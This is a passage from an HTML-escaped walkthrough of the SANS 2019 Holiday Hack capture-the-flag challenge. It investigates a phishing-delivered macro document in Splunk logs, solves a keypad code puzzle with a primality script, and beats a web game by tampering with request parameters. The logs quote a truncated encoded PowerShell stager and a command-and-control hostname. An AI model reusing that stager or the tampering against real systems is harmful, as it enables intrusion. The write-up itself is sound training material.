the &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search?q=search%20index%3Dmain%20santa&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.general.type=events&amp;amp;display.page.search.tab=events&amp;amp;sid=1577722638.3279"&gt;Splunk search engine&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The very first result is a suspiciously long PowerShell command accesses a file
likely sent by Santa to Professor Banas:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;08/25/2019 09:19:20 AM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4103
EventType=4
Type=Information
ComputerName=sweetums.elfu.org
User=NOT_TRANSLATED
Sid=S-1-5-21-1217370868-2414566453-2573080502-1004
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when operation is just executing a method
RecordNumber=417616
Keywords=None
Message=CommandInvocation(Stop-AgentJob): &amp;quot;Stop-AgentJob&amp;quot;
CommandInvocation(Format-List): &amp;quot;Format-List&amp;quot;
CommandInvocation(Out-String): &amp;quot;Out-String&amp;quot;
ParameterBinding(Stop-AgentJob): name=&amp;quot;JobName&amp;quot;; value=&amp;quot;4VCUDA&amp;quot;
&lt;span class="hll"&gt;ParameterBinding(Format-List): name=&amp;quot;InputObject&amp;quot;; value=&amp;quot;C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt:1:Carl, you know there&amp;#39;s no one I trust more than you to help.  Can you have a look at this draft Naughty and Nice list for 2019 and let me know your thoughts? -Santa&amp;quot;
&lt;/span&gt;ParameterBinding(Out-String): name=&amp;quot;InputObject&amp;quot;; value=&amp;quot;Microsoft.PowerShell.Commands.Internal.Format.FormatStartData&amp;quot;
ParameterBinding(Out-String): name=&amp;quot;InputObject&amp;quot;; value=&amp;quot;Microsoft.PowerShell.Commands.Internal.Format.GroupStartData&amp;quot;
ParameterBinding(Out-String): name=&amp;quot;InputObject&amp;quot;; value=&amp;quot;Microsoft.PowerShell.Commands.Internal.Format.FormatEntryData&amp;quot;
ParameterBinding(Out-String): name=&amp;quot;InputObject&amp;quot;; value=&amp;quot;Microsoft.PowerShell.Commands.Internal.Format.GroupEndData&amp;quot;
ParameterBinding(Out-String): name=&amp;quot;InputObject&amp;quot;; value=&amp;quot;Microsoft.PowerShell.Commands.Internal.Format.FormatEndData&amp;quot;


Context:
        Severity = Informational
        Host Name = ConsoleHost
        Host Version = 5.1.17134.858
        Host ID = c44dfd99-a4ba-452c-bf0d-07206a97112b
        Host Application = powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAUwBpAG8ATgBUAGEAQgBMAGUALgBQAFMAVgBFAFIAcwBJAE8AbgAuAE0AQQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAGYAXQAuAEEAUwBzAEUATQBCAGwAeQAuAEcARQBUAFQAeQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAEwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgA
        [...]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The file that was accessed is &lt;code&gt;C:\Users\cbanas\Documents\Naughty_and_Nice_2019_draft.txt&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="third-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id19"&gt;Third question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;What is the fully-qualified domain name(FQDN) of the command and control(C2)
server? (Example: badguy.baddies.com)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;So, we know that the malware is likely using PowerShell. So let's search for
&lt;code&gt;powershell.exe&lt;/code&gt; in the &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search?q=search%20index%3Dmain%20powershell.exe&amp;amp;display.page.search.mode=smart&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;display.general.type=events&amp;amp;display.page.search.tab=events&amp;amp;sid=1577723101.3323"&gt;Splunk search engine&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;By looking at the different fields on the side, we can see one named
&lt;code&gt;DestinationHostname&lt;/code&gt;, which is prety self-explanatory: it's likely the
hostnames that our PowerShell processes are communicating with:&lt;/p&gt;
&lt;img alt="splunk_powershell_destination_hostname.png" class="align-center" src="/images/sans-christmas-challenge-2019/splunk_powershell_destination_hostname.png" /&gt;
&lt;p&gt;We can see that around 92% of every events concerning &lt;code&gt;powershell.exe&lt;/code&gt;
are communicating with the hostname &lt;code&gt;144.202.46.214.vultr.com&lt;/code&gt;. This is
most likely our C2 FQDN.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fourth-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id20"&gt;Fourth question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;What document is involved with launching the malicious PowerShell code?
Please provide just the filename. (Example: results.txt)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now, by taking a look at the different logs, we can see that Prof. Cabanas has
received a lot of emails by students, sending their assignments as attachments.
The most likely compromise path probably involves a malicious Microsoft Office
document with embedded macros that ran the malicious PowerShell code.&lt;/p&gt;
&lt;p&gt;Let's search for the Microsoft Word process &lt;code&gt;WINWORD.EXE&lt;/code&gt; in the &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search?q=search%20winword.exe&amp;amp;sid=1577783349.64&amp;amp;display.page.search.mode=verbose&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now"&gt;Splunk
search engine&lt;/a&gt;.
By taking a look at the &lt;code&gt;RuleName&lt;/code&gt; attributes, we can see that one
Microsoft Word process triggered a rule called &amp;quot;Execution - Suspicious WMI
module load&amp;quot;. This can indicate the execution of a macro in a Word document:&lt;/p&gt;
&lt;img alt="splunk_winword_rule.png" class="align-center" src="/images/sans-christmas-challenge-2019/splunk_winword_rule.png" /&gt;
&lt;p&gt;Let's investigate &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search?q=search%20winword.exe%20RuleName%3D%22Execution%20-%20Suspicious%20WMI%20module%20load%22&amp;amp;display.page.search.mode=verbose&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;sid=1577783465.72"&gt;this particular&lt;/a&gt;
&lt;code&gt;WINWORD.EXE&lt;/code&gt; process. We can see from the Splunk search engine that it
was run at around 5:18 PM on 2019-08-25. This Microsoft Word process had a PID
of 6268.&lt;/p&gt;
&lt;img alt="splunk_winword_pid.png" class="align-center" src="/images/sans-christmas-challenge-2019/splunk_winword_pid.png" /&gt;
&lt;p&gt;Let's search only for this PID in the &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search?q=search%20process_id%3D6268&amp;amp;display.page.search.mode=verbose&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=0&amp;amp;latest=now&amp;amp;sid=1577783848A"&gt;Splunk search engine&lt;/a&gt;.&lt;/p&gt;
&lt;img alt="splunk_winword_file_path.png" class="align-center" src="/images/sans-christmas-challenge-2019/splunk_winword_file_path.png" /&gt;
&lt;p&gt;We can see in the &lt;code&gt;file_path&lt;/code&gt; attribute that this process opened a
document called &lt;code&gt;C:\Users\cbanas\AppData\Local\Packages\oice_16_974fa576_32c1d314_3570\AC\Temp\26251897.docm&lt;/code&gt;.
This looks like a good candidate. Indeded, &lt;code&gt;.docm&lt;/code&gt; documents are Office
Documents that can execute macros. However, &lt;code&gt;26251897.docm&lt;/code&gt;, is not the
original name of this document.&lt;/p&gt;
&lt;p&gt;We can see that it's in Prof Banas' temporary folder, with a temporary name.
This often happens if the file was directly open from the Internet, or from an
archive without first decompressing it to disk.&lt;/p&gt;
&lt;p&gt;We know the Microsoft Word process responsible for executing the PowerShell
payload was launched at around 5:18 Pm on 2019-08-25. Let's look for &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search?q=search%20mail&amp;amp;display.page.search.mode=verbose&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=1566753300&amp;amp;latest=1566753600&amp;amp;sid=1577783990.89"&gt;emails
received around that time&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We can see that only one email was received around that time:&lt;/p&gt;
&lt;img alt="splunk_email.png" class="align-center" src="/images/sans-christmas-challenge-2019/splunk_email.png" /&gt;
&lt;p&gt;It had, indeed, a ZIP archive as an attachment, containing a document called
&lt;code&gt;19th Century Holiday Cheer Assignment.docm&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="fifth-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id21"&gt;Fifth question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;How many unique email addresses were used to send Holiday Cheer essays to
Professor Banas? Please provide the numeric value. (Example: 1)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Now that is a question I find more easily answered using the &lt;a class="reference external" href="http://elfu-soc.s3-website-us-east-1.amazonaws.com/"&gt;file archive&lt;/a&gt;. We can &lt;code&gt;grep&lt;/code&gt;
for &lt;code&gt;From:&lt;/code&gt; header directly in the files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -hR &lt;span class="s1"&gt;&amp;#39;From: &amp;#39;&lt;/span&gt; .
&lt;span class="go"&gt;From: Merry Fairybubbles &amp;lt;Merry.Fairybubbles@students.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Carl Banas &amp;lt;Carl.Banas@faculty.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Sixpence Snowcane &amp;lt;Sixpence.Snowcane@students.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Sparkle Redberry &amp;lt;Sparkle.Redberry@students.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Partridge Sugartree &amp;lt;Partridge.Sugartree@students.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Turtledove Fairytree &amp;lt;Turtledove.Fairytree@students.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Cherry Brandyfluff &amp;lt;Cherry.Brandyfluff@students.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Carl Banas &amp;lt;Carl.Banas@faculty.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;From: Cupcake Silverlog &amp;lt;Cupcake.Silverlog@students.elfu.org&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;[...]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's remove Prof Banas' email address from the results, and let's get only
unique outputs:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -hR &lt;span class="s1"&gt;&amp;#39;From: &amp;#39;&lt;/span&gt; . &lt;span class="p"&gt;|&lt;/span&gt; sort -u &lt;span class="p"&gt;|&lt;/span&gt; grep -v &lt;span class="s1"&gt;&amp;#39;Carl Banas&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; wc -l
&lt;span class="go"&gt;21&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Twenty-one unique email addresses were used to send essays to Prof Banas.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="sixth-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id22"&gt;Sixth question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;What was the password for the zip archive that contained the suspicious
file?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;In question four, we were able to find the malicious mail containing the
archive. Let's take a look &lt;a class="reference external" href="https://splunk.elfu.org/en-US/app/SA-elfusoc/search?q=search%20mail&amp;amp;display.page.search.mode=verbose&amp;amp;dispatch.sample_ratio=1&amp;amp;earliest=1566753300&amp;amp;latest=1566753600&amp;amp;sid=1577783990.89#"&gt;at this email&lt;/a&gt; one more time. We can see in the
&lt;code&gt;results{}.workers.smtp.body&lt;/code&gt; property the content of the email:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;professor banas, i have completed my assignment. please open the attached
zip file with password 123456789 and then open the word document to view
it. you will have to click &amp;quot;enable editing&amp;quot; then &amp;quot;enable content&amp;quot; to see
it. this was a fun assignment. i hope you like it!&lt;/p&gt;
&lt;p class="attribution"&gt;&amp;mdash;bradly buttercups&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The password for the file is &lt;code&gt;123456789&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="seventh-question"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id23"&gt;Seventh question&lt;/a&gt;&lt;/h4&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;What email address did the suspicious file come from?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;From the same email, we can find the sender's email address. It's
&lt;code&gt;bradly.buttercups&amp;#64;eIfu.org&amp;gt;&lt;/code&gt;. You can notice that the second letter in
the domain is a capital &lt;code&gt;i&lt;/code&gt; and not a lowercase &lt;code&gt;l&lt;/code&gt;. It's a common
trick used when sending a phishing email.&lt;/p&gt;
&lt;p&gt;Now let's mock Kent:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; Oh man that's pretty embarrassing, eh?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kent:&lt;/strong&gt; Oh you again?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; lulz...&lt;/p&gt;
&lt;blockquote&gt;
Kent you are so unfair. And we were going to make you the king of the
Winter Carnival.&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Kent:&lt;/strong&gt; You'll rue the day.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Guest (me):&lt;/strong&gt; Who talks like that?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Kent, you're the worst.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-7"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id24"&gt;Objective 7:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="the-dorm-room-s-keypad"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id25"&gt;The Dorm Room's Keypad&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;There's a keypad controlling the access to the elves' dorm room. Since it's
colde outside, the keys are a little bit frosty:&lt;/p&gt;
&lt;img alt="frosty_keypad.png" class="align-center" src="/images/sans-christmas-challenge-2019/frosty_keypad.png" /&gt;
&lt;p&gt;We can kind of make out the keys that are most used: 1, 3, and 7. &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Leet"&gt;Naturally&lt;/a&gt;,
I tried &lt;code&gt;1337&lt;/code&gt;, but this wasn't the right code.&lt;/p&gt;
&lt;p&gt;Luckily, Tangle Coalbox is here to provide us with clues.&lt;/p&gt;
&lt;img alt="tangle_coalbox.png" class="align-center" src="/images/sans-christmas-challenge-2019/tangle_coalbox.png" /&gt;
&lt;p&gt;&lt;em&gt;Tangle Coalbox says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey kid, it's me, Tangle Coalbox.&lt;/p&gt;
&lt;p&gt;I'm sleuthing again, and I could use your help.&lt;/p&gt;
&lt;p&gt;Ya see, this here number lock's been popped by someone.&lt;/p&gt;
&lt;p&gt;I think I know who, but it'd sure be great if you could open this up for me.&lt;/p&gt;
&lt;p&gt;I've got a few clues for you.&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;One digit is repeated once.&lt;/li&gt;
&lt;li&gt;The code is a prime number.&lt;/li&gt;
&lt;li&gt;You can probably tell by looking at the keypad which buttons are used.&lt;/li&gt;
&lt;/ol&gt;
&lt;/blockquote&gt;
&lt;p&gt;Alright, we were on the right track: we can see which buttons are used, and our
first code had indeed one digit repeated once. However, 1337 is &lt;a class="reference external" href="https://www.isprimenumber.com/prime/1337"&gt;not a prime
number&lt;/a&gt;. So, let's code a little
script that will generate potential candidates. I used Python, with the
&lt;a class="reference external" href="https://www.sympy.org/en/index.html"&gt;sympy&lt;/a&gt; library to test primality:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;itertools&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;permutations&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;sympy&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;isprime&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# These are our three digits&lt;/span&gt;
    &lt;span class="n"&gt;base_digits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;137&amp;#39;&lt;/span&gt;
    &lt;span class="n"&gt;valid_candidates&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;set&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;d&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;base_digits&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# We create a string with four digits, by repeating each digit once&lt;/span&gt;
        &lt;span class="n"&gt;doubled_digits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;d&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;base_digits&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;p&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;permutations&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;doubled_digits&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="n"&gt;candidate&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;p&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;isprime&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;int&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;candidate&lt;/span&gt;&lt;span class="p"&gt;)):&lt;/span&gt;
                &lt;span class="n"&gt;valid_candidates&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;candidate&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;valid_candidates&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;$ ./frost_key_pad.py
&lt;span class="m"&gt;1373&lt;/span&gt;
&lt;span class="m"&gt;3371&lt;/span&gt;
&lt;span class="m"&gt;7331&lt;/span&gt;
&lt;span class="m"&gt;3137&lt;/span&gt;
&lt;span class="m"&gt;1733&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have only five candidates. By trying them each one by one, we find that
the correct code is &lt;code&gt;7331&lt;/code&gt; (which is &lt;code&gt;1337&lt;/code&gt; backwards, might have
found it with a little bit of guessing).&lt;/p&gt;
&lt;img alt="keypad_code.gif" class="align-center" src="/images/sans-christmas-challenge-2019/keypad_code.gif" /&gt;
&lt;/div&gt;
&lt;div class="section" id="minty-candy-cane-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id26"&gt;Minty Candy Cane's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We have an old video game that we must beat:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to the Trail! It's nearly time for Kringlecon. You need to get
there before the 25th day of December! Hitch up your reindeer, gather your
supplies, and do your best to make it to the North Pole on time.&lt;/p&gt;
&lt;p&gt;Good luck!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There are three difficulty level, easy, medium, and hard.&lt;/p&gt;
&lt;p&gt;Now, let's select the easy mode, and start playing:&lt;/p&gt;
&lt;img alt="trail_easy_distance_0.png" class="align-center" src="/images/sans-christmas-challenge-2019/trail_easy_distance_0.png" /&gt;
&lt;p&gt;Hmm, we can see a &lt;code&gt;distance&lt;/code&gt; parameter in the URL. We also see that we
have a remaining distance of 8000. What happends if we modify the
&lt;code&gt;distance&lt;/code&gt; parameter in the URL?&lt;/p&gt;
&lt;img alt="trail_easy_distance_1.png" class="align-center" src="/images/sans-christmas-challenge-2019/trail_easy_distance_1.png" /&gt;
&lt;p&gt;Well, if we put &lt;code&gt;distance=1&lt;/code&gt;, we can see that the remaining distance is
7999. So, let's put &lt;code&gt;distance=8000&lt;/code&gt; and press GO:&lt;/p&gt;
&lt;img alt="trail_easy_distance_8000.png" class="align-center" src="/images/sans-christmas-challenge-2019/trail_easy_distance_8000.png" /&gt;
&lt;p&gt;Alright, that &lt;em&gt;was&lt;/em&gt; easy! Let's try the medium mode:&lt;/p&gt;
&lt;img alt="trail_medium_distance_0.png" class="align-center" src="/images/sans-christmas-challenge-2019/trail_medium_distance_0.png" /&gt;
&lt;p&gt;So, no parameter in the URL. Let's launch Burp, and see what happens if we
press GO:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/trail/&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;416&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail-mix-cookie=fd1ec9a9109e6fd09265795ccebab2d65473a9d2&lt;/span&gt;

pace=0&amp;amp;playerid=JebediahSpringfield&amp;amp;action=go&amp;amp;difficulty=1&amp;amp;money=3000&amp;amp;distance=0&amp;amp;curmonth=8&amp;amp;curday=1&amp;amp;name0=Jane&amp;amp;health0=100&amp;amp;cond0=0&amp;amp;cause0=&amp;amp;deathday0=0&amp;amp;deathmonth0=0&amp;amp;name1=Anna&amp;amp;health1=100&amp;amp;cond1=0&amp;amp;cause1=&amp;amp;deathday1=0&amp;amp;deathmonth1=0&amp;amp;name2=Vlad&amp;amp;health2=100&amp;amp;cond2=0&amp;amp;cause2=&amp;amp;deathday2=0&amp;amp;deathmonth2=0&amp;amp;name3=Vlad&amp;amp;health3=100&amp;amp;cond3=0&amp;amp;cause3=&amp;amp;deathday3=0&amp;amp;deathmonth3=0&amp;amp;reindeer=2&amp;amp;runners=2&amp;amp;ammo=50&amp;amp;meds=10&amp;amp;food=200&amp;amp;hash=HASH
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, the &lt;code&gt;distance&lt;/code&gt; parameter is not in the URL anymore, it's sent by
&lt;code&gt;POST&lt;/code&gt;. So, let's press the GO button once more, intercept the request
in Burp, and change the &lt;code&gt;distance&lt;/code&gt; value to 8000:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/trail/&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;416&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail-mix-cookie=fd1ec9a9109e6fd09265795ccebab2d65473a9d2&lt;/span&gt;

pace=0&amp;amp;playerid=JebediahSpringfield&amp;amp;action=go&amp;amp;difficulty=1&amp;amp;money=3000&amp;amp;distance=8000&amp;amp;curmonth=8&amp;amp;curday=1&amp;amp;name0=Jane&amp;amp;health0=100&amp;amp;cond0=0&amp;amp;cause0=&amp;amp;deathday0=0&amp;amp;deathmonth0=0&amp;amp;name1=Anna&amp;amp;health1=100&amp;amp;cond1=0&amp;amp;cause1=&amp;amp;deathday1=0&amp;amp;deathmonth1=0&amp;amp;name2=Vlad&amp;amp;health2=100&amp;amp;cond2=0&amp;amp;cause2=&amp;amp;deathday2=0&amp;amp;deathmonth2=0&amp;amp;name3=Vlad&amp;amp;health3=100&amp;amp;cond3=0&amp;amp;cause3=&amp;amp;deathday3=0&amp;amp;deathmonth3=0&amp;amp;reindeer=2&amp;amp;runners=2&amp;amp;ammo=50&amp;amp;meds=10&amp;amp;food=200&amp;amp;hash=HASH
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="trail_medium_distance_8000.png" class="align-center" src="/images/sans-christmas-challenge-2019/trail_medium_distance_8000.png" /&gt;
&lt;p&gt;Not too bad! Now, let's try the hard mode.&lt;/p&gt;
&lt;p&gt;The hard mode works the same as the medium mode however, there is a
verification hash that is used to verify that we did not modify the state, as
we did previously. Here's the original request:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/trail/&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trail.elfu.org&lt;/span&gt;
